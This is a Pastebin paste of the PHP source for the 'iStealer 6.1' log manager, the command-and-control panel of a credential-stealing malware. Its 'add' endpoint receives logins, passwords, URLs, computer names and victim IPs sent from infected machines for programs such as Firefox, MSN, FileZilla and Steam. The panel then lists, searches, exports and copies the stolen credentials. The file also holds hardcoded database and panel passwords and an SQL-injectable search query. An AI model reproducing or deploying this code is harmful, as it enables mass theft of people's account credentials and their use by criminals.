daily pastebin goal
58%
SHARE
TWEET

Untitled

a guest Jun 7th, 2017 127 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.     // CONFIGURATION ******************************************************************************
  3.  
  4.    $dbHost     = "justfree.com";        // MySQL host
  5.    $dbUser     = "minisluts_vlex";  // MySQL username
  6.    $dbPass     = "mrvica";  // MySQL password
  7.    $dbDatabase = "minisluts_accovi";    // MySQL database name
  8.    
  9.    $username   = "yassa";       // Login Username
  10.    $password   = "vlex";        // Login Password
  11.    
  12.    $logspage   = 50;            // Number of logs per page
  13.    
  14.     // ********************************************************************************************
  15.  
  16.     $html       = "<html><head><title>iStealer 6.1 Legends Log manager - ";
  17.     $header     = "</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>
  18.                 <div id='web'><div id='header'><b>Hello, ".$username."</b></div><div id='navigation'><ul>
  19.                 <li><a href='?action=logs'>Show All Logs</a></li><li><a href='?action=search'>Search</a></li>
  20.                 <li><a href='?action=exportall'>Export All Logs</a></li>
  21.                 <li><a href='?action=logout'>Logout</a></li></ul></div><br>";
  22.     $footer     = "<div id='footer'>iStealer 6.1 Legends - Kizar Labs 2009</div></div></body></html>";
  23.     $searchform = "<form name='search' method='POST' action='?action=search'>
  24.                 Search for: <input type='text' name='q' size='20'> In: <select name='in'>
  25.                 <option selected='selected' value='1'>Url</option><option value='2'>Login</option>
  26.                 <option value='3'>Password</option><option value='4'>Computer</option>
  27.                 <option value='5'>Date</option><option value='6'>Ip</option></select>
  28.                 <input type='submit' value='Search' name='search'></form>";
  29.     $loginform  = "<form id='loginform' name='frm' method='POST' action='?action=login'>
  30.                 <table id='logintable' cellpadding='0' cellspacing='10' border='0'>
  31.                 <tr><td>Username:</td><td><input type='text' name='username' size='20'></td></tr>
  32.                 <tr><td>Password:</td><td><input type='password' name='password' size='20'></td></tr>
  33.                 <tr><td></td><td><input type='submit' value='Login' name='login'></td></tr></form>";
  34.     $javascript  = "<script language='javascript' type='text/javascript'>
  35.                 function checkAll() { chk = document.getElementsByName('sel[]');
  36.                 for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_all'].checked) chk[i].checked = true; else chk[i].checked = false;}}
  37.                 function checkform() { chk = document.getElementsByName('sel[]'); for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) {
  38.                 return true;}} alert('At least one option must be select.'); return false; }
  39.                 function confirmation() { return confirm('Are you sure you want to delete all selected logs?');}</script>";
  40.     $aplications = array("MSN Messenger", "Google talk", "Trillian/MSN", "Trillian/AIM", "Trillian/Yahoo", "Pidgin/Gaim", "Paltalk Scene", "Steam",
  41.                     "No-Ip" , "DynDNS", "Firefox", "Internet Explorer", "Google Chrome", "Opera", "IDM", "FileZilla", "FlashFXP", "SmartFtp", "CuteFtp");
  42.     $cols        = array("program", "url", "login", "pass", "computer", "date", "ip");
  43.  
  44.     // FUNCTIONS ******************************************************************************
  45.     function connect_database() {
  46.         global $dbHost, $dbUser, $dbPass, $dbDatabase, $html, $header, $footer;
  47.         $mysql = mysql_connect($dbHost, $dbUser, $dbPass);
  48.         if (!$mysql) {
  49.             $html .= "Database Error".$header."Can not connect to database, please check the configuration.".$footer;
  50.             die($html);
  51.         }
  52.         if (!mysql_select_db($dbDatabase, $mysql)) {
  53.             mysql_close($mysql);
  54.             $html .= "Database Error".$header."Can not select '".$dbDatabase."' database, please check the configuration.".$footer;
  55.             die($html);
  56.         }
  57.         return $mysql;
  58.     }
  59.     function pages_number($logstotal, $logspage) {
  60.         $pagesnumber = ceil($logstotal/$logspage);
  61.         $temp = "Pages: ";
  62.         for ($i=0; $i<$pagesnumber; $i++) {
  63.             if ($_SESSION["page"] == $i)
  64.                 $temp .= " <span class='page1'>".$i."</span>";
  65.             else
  66.                 $temp .= " <span class='page0'><a href='?action=logs&page=".$i."'>".$i."</a></span>";
  67.         }
  68.         $temp .= " Results ".($_SESSION["page"]*$logspage)." - ".(($_SESSION["page"]*$logspage)+$logspage)." of about ".$logstotal;
  69.         return $temp;
  70.     }
  71.     function sort_order() {
  72.         if ($_SESSION["order"] == 0) $tmp = "ASC"; else $tmp = "DESC";
  73.             return $tmp;
  74.     }
  75.  
  76.     // TEST *************************************************************************************
  77.     if ($_GET["action"] == "test") {
  78.         $mysql = connect_database();
  79.         $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  80.         if ($result) {
  81.             echo "Ready";
  82.         } else {
  83.             echo "NoReady";
  84.         }
  85.         mysql_close($mysql);
  86.         exit;
  87.     }
  88.  
  89.     // ADD ***************************************************************************************
  90.     if ($_GET["action"] == "add") {
  91.         if (isset($_GET["a"]) && isset($_GET["c"]) && isset($_GET["u"]) && isset($_GET["l"])&& isset($_GET["p"])
  92.         && is_numeric($_GET["a"]) && $_GET["a"]>=0 && $_GET["a"]<=18 && strlen($_GET["p"])>3) {
  93.             $mysql = mysql_connect($dbHost, $dbUser, $dbPass);
  94.             if (!$mysql) exit;
  95.             if (!mysql_select_db($dbDatabase, $mysql)) exit;
  96.             $result = mysql_query("SELECT * FROM `logs` WHERE `program` = '".$_GET["a"]."' AND `url` = '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["u"])), $mysql).
  97.             "' AND `login` = '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["l"])), $mysql)."' AND `pass` = '".
  98.             mysql_real_escape_string(htmlspecialchars(urldecode($_GET["p"])), $mysql)."';", $mysql);
  99.             if (!$result) exit;
  100.             if (mysql_num_rows($result) == 0) {
  101.                 $result = mysql_query("INSERT INTO `logs` (`id`, `program`, `url`, `login`, `pass`, `computer`, `date`, `ip`) VALUES (NULL , '".
  102.                 $_GET["a"]."', '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["u"])), $mysql)."', '".
  103.                 mysql_real_escape_string(htmlspecialchars(urldecode($_GET["l"])), $mysql)."', '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["p"])), $mysql)."', '".
  104.                 mysql_real_escape_string(htmlspecialchars(urldecode($_GET["c"])), $mysql)."', '".date("Y-m-d H:i:s")."', '".$_SERVER['REMOTE_ADDR']."');", $mysql);
  105.             }
  106.             mysql_close($mysql);
  107.         }
  108.         exit;
  109.     }
  110.  
  111.     // LOGIN **************************************************************************************
  112.     session_start();
  113.     if ($_SESSION["user"]!=$username || $_SESSION["ip"]!=$_SERVER["REMOTE_ADDR"]) {
  114.         if ($_GET["action"] == "login") {
  115.             if (isset($_POST["username"]) && isset($_POST["password"]) && $username==$_POST["username"] && $password==$_POST["password"]) {
  116.                 session_start();
  117.                 $_SESSION["user"] = $username;
  118.                 $_SESSION["ip"] = $_SERVER["REMOTE_ADDR"];
  119.                 $_SESSION["sort"] = 5;
  120.                 $_SESSION["order"] = 1;
  121.                 $_SESSION["page"] = 0;
  122.                
  123.                 $mysql = connect_database();
  124.                 $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  125.                 if (!$result) {
  126.                     $result = mysql_query("CREATE TABLE `logs` (`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY, `program` INT NOT NULL, `url`
  127.                                 VARCHAR(150) NOT NULL, `login` VARCHAR(50) NOT NULL, `pass` VARCHAR(50) NOT NULL, `computer` VARCHAR(50) NOT NULL, `date`
  128.                                 DATETIME NOT NULL, `ip` VARCHAR(15) NOT NULL);", $mysql);
  129.                     if (!$result) {
  130.                         $html .= "Database Error".$header."Can not create table 'logs', please check the configuration and your priviledges.".$footer;
  131.                         die($html);
  132.                     }
  133.                 }
  134.                 mysql_close($mysql);
  135.                 header("Location: ?action=logs");
  136.             } else {
  137.                 $html = "<html><head><title>Login Error</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  138.                 echo $html;
  139.                 exit;
  140.             }
  141.         } else {
  142.             $html = "<html><head><title>Login</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  143.             echo $html;
  144.             exit;
  145.         }
  146.     }
  147.  
  148.     // LOGOUT ************************************************************************************
  149.     if ($_GET["action"] == "logout") {
  150.         unset($_SESSION["user"]);
  151.         unset($_SESSION["ip"]);
  152.         unset($_SESSION["sort"]);
  153.         unset($_SESSION["order"]);
  154.         unset($_SESSION["page"]);
  155.         session_unset();
  156.         header("Location: index.php");
  157.  
  158.     // LOGS **************************************************************************************
  159.     } elseif ($_GET["action"] == "logs" || !isset($_GET["action"])) {
  160.    
  161.         if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=6) {
  162.             if ($_SESSION["sort"] == $_GET["sort"])
  163.                 if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort"] = $_GET["sort"];
  164.         }
  165.  
  166.         $mysql = connect_database();
  167.         $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  168.         $logstotal = mysql_result($result, 0);
  169.         if ($logstotal > 0) {
  170.             if (isset($_GET["page"]) && is_numeric($_GET["page"]) && $_GET["page"]>=0 && $_GET["page"]<=ceil($logstotal/$logspage))
  171.                 $_SESSION["page"] = $_GET["page"];
  172.            
  173.             $result = mysql_query("SELECT * FROM `logs` ORDER BY `".$cols[$_SESSION["sort"]]."` ".sort_order()." LIMIT ".($logspage*$_SESSION["page"])." , ".$logspage.";", $mysql);
  174.             if (!$result) die(mysql_error());
  175.            
  176.             $html .= "Logs".$header.$javascript."
  177.                     <form name='frm' method='POST' action='?action=selected' onsubmit='return checkform();'>
  178.                     <table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  179.                     <td><a href='?action=logs&sort=0'>Program</a></td><td><a href='?action=logs&sort=1'>Url / Host</a></td>
  180.                     <td><a href='?action=logs&sort=2'>Login</a></td><td><a href='?action=logs&sort=3'>Password</a></td>
  181.                     <td><a href='?action=logs&sort=4'>Computer</a></td><td><a href='?action=logs&sort=5'>Date</a></td>
  182.                     <td><a href='?action=logs&sort=6'>Ip</a></td>
  183.                     <td><input type='checkbox' name='check_all' onClick='checkAll();'></td></tr>";
  184.             $i = 0;
  185.             while ($row = mysql_fetch_array($result)) {
  186.                 $html .= "<tr class='";
  187.                 if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  188.                 $html .= "'><td>".$aplications[$row["program"]]."</td>";
  189.                 $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  190.                 $html .= "<td>".$row["computer"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  191.                 $html .= "<td><input type='checkbox' name='sel[]' value='".$row["id"]."'></td></tr>";
  192.                 $i++;
  193.             }
  194.             $html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage)."</div><div id='buttons'><input name='buttonact'
  195.             type='submit' value='Copy Selected'> <input name='buttonact' type='submit' value='Export Selected'> <input name='buttonact' type='submit'
  196.             value='Delete Selected' onclick='if (!confirmation()) return false;'></div></div></form>".$footer;
  197.         } else {
  198.             $html .= "Logs".$header."No logs found!".$footer;
  199.         }
  200.         mysql_close($mysql);
  201.         echo $html;
  202.  
  203.     // SEARCH ************************************************************************************
  204.     } elseif ($_GET["action"] == "search") {
  205.         if (isset($_POST["q"]) && isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"]>0 && $_POST["in"]<=6) {
  206.             $mysql = connect_database();
  207.             $result = mysql_query("SELECT * FROM `logs` WHERE `".$cols[$_POST["in"]]."` LIKE '%".$_POST["q"]."%';", $mysql);
  208.             if (!$result) die(mysql_error());
  209.            
  210.             if (mysql_num_rows($result) > 0) {
  211.                 $html .= "Search".$header.$javascript.$searchform."
  212.                     <form name='frm' method='POST' action='?action=selected' onsubmit='return checkform();'>
  213.                     <table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  214.                     <td>Program</td><td>Url / Host</td>
  215.                     <td>Login</td><td>Password</td>
  216.                     <td>Computer</td><td>Date</td>
  217.                     <td>Ip</td>
  218.                     <td><input type='checkbox' name='check_all' onClick='checkAll();'></td></tr>";
  219.                 $i = 0;
  220.                 while ($row = mysql_fetch_array($result)) {
  221.                     $html .= "<tr class='";
  222.                     if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  223.                     $html .= "'><td>".$aplications[$row["program"]]."</td>";
  224.                     $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  225.                     $html .= "<td>".$row["computer"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  226.                     $html .= "<td><input type='checkbox' name='sel[]' value='".$row["id"]."'></td></tr>";
  227.                     $i++;
  228.                 }
  229.                 $html .= "</table><div id='pages'><div id='numbers'>".mysql_num_rows($result)." results for '".$_POST["q"]."'</div><div id='buttons'>
  230.                 <input name='buttonact' type='submit' value='Copy Selected'> <input name='buttonact' type='submit' value='Export Selected'>
  231.                 <input name='buttonact' type='submit' value='Delete Selected' onclick='if (!confirmation()) return false;'></div></div></form>".$footer;
  232.             } else {
  233.                 $html .= "Search".$header.$searchform."<br>No results found!".$footer;
  234.             }
  235.             mysql_close($mysql);
  236.         } else {
  237.             $html .= "Search".$header.$searchform.$footer;
  238.         }
  239.         echo $html;
  240.    
  241.     // EXPORT ALL ************************************************************************************
  242.     } elseif ($_GET["action"] == "exportall") {
  243.         header("Content-Type: text/plain");
  244.         header("Content-Disposition: Attachment; filename=iStealer_6.0_export.txt");
  245.         header("Pragma: no-cache");
  246.        
  247.         $mysql = connect_database();
  248.         $result = mysql_query("SELECT * FROM `logs`;", $mysql);
  249.         if (!$result) die(mysql_error());
  250.        
  251.         while ($row = mysql_fetch_array($result)) {
  252.             echo "Program:\t".$aplications[$row['program']]."\r\n";
  253.             echo "Url/Host:\t".$row['url']."\r\n";
  254.             echo "Login:\t\t".$row['login']."\r\n";
  255.             echo "Password:\t".$row['pass']."\r\n";
  256.             echo "Computer:\t".$row['computer']."\r\n";
  257.             echo "Date:\t\t".$row['date']."\r\n";
  258.             echo "Ip:\t\t\t".$row['ip']."\r\n";
  259.             echo "----------------------------------------------------------\r\n";
  260.         }
  261.         mysql_close($mysql);
  262.    
  263.     // SELECTED **************************************************************************************
  264.     } elseif ($_GET["action"] == "selected") {
  265.         if (isset($_POST["buttonact"]) && isset($_POST["sel"]) && count($_POST["sel"])!=0) {
  266.  
  267.             // DELETE SELECTED ***********************************************************************
  268.             if ($_POST["buttonact"] == "Delete Selected") {
  269.                 $mysql = connect_database();
  270.                 $query = "DELETE FROM `logs` WHERE";
  271.                 for ($i=0; $i<count($_POST["sel"]); $i++) {
  272.                     if (is_numeric($_POST["sel"][$i]))
  273.                         $query .= " `id` = ".$_POST["sel"][$i]." OR";
  274.                 }
  275.                 $query .= ';';
  276.                 $query = str_replace(' OR;', ';', $query);
  277.                 $result = mysql_query($query, $mysql);
  278.                 if (!$result) die(mysql_error());
  279.                 mysql_close($mysql);
  280.                 header("Location: ?action=logs");
  281.  
  282.             // EXPORT SELECTED ***********************************************************************
  283.             } elseif ($_POST["buttonact"] == "Export Selected") {
  284.                 header("Content-Type: text/plain");
  285.                 header("Content-Disposition: Attachment; filename=iStealer_6.0_export.txt");
  286.                 header("Pragma: no-cache");
  287.                 $mysql = connect_database();
  288.                 $query = "SELECT * FROM `logs` WHERE";
  289.                 for ($i=0; $i<count($_POST["sel"]); $i++) {
  290.                     if (is_numeric($_POST["sel"][$i]))
  291.                         $query .= " `id` = ".$_POST["sel"][$i]." OR";
  292.                 }
  293.                 $query .= ';';
  294.                 $query = str_replace(' OR;', ';', $query);
  295.                 $result = mysql_query($query, $mysql);
  296.                 if (!$result) die(mysql_error());
  297.                 while ($row = mysql_fetch_array($result)) {
  298.                     echo "Program:\t".$aplications[$row['program']]."\r\n";
  299.                     echo "Url/Host:\t".$row['url']."\r\n";
  300.                     echo "Login:\t\t".$row['login']."\r\n";
  301.                     echo "Password:\t".$row['pass']."\r\n";
  302.                     echo "Computer:\t".$row['computer']."\r\n";
  303.                     echo "Date:\t\t".$row['date']."\r\n";
  304.                     echo "Ip:\t\t\t".$row['ip']."\r\n";
  305.                     echo "----------------------------------------------------------\r\n";
  306.                 }
  307.                 mysql_close($mysql);
  308.  
  309.             // COPY SELECTED *************************************************************************
  310.             } elseif ($_POST["buttonact"] == "Copy Selected") {
  311.                 $mysql = connect_database();
  312.                 $query = "SELECT `login`, `pass` FROM `logs` WHERE";
  313.                 for ($i=0; $i<count($_POST["sel"]); $i++) {
  314.                     if (is_numeric($_POST["sel"][$i]))
  315.                         $query .= " `id` = ".$_POST["sel"][$i]." OR";
  316.                 }
  317.                 $query .= ';';
  318.                 $query = str_replace(' OR;', ';', $query);
  319.                 $result = mysql_query($query, $mysql);
  320.                 if (!$result) die(mysql_error());
  321.                 $html .= "Copy".$header."<table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr class='row1'><td>";
  322.                 while ($row = mysql_fetch_array($result))
  323.                     $html .= $row['login'].":".$row['pass']."<br>";
  324.                 mysql_close($mysql);
  325.                 $html .= "</td></tr></table><br>".$footer;
  326.                 echo $html;
  327.             }
  328.         }
  329.     } else {
  330.         $html .= "Unexpected Error".$header."Unexpected Error".$footer;
  331.         echo $html;
  332.     }
  333. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top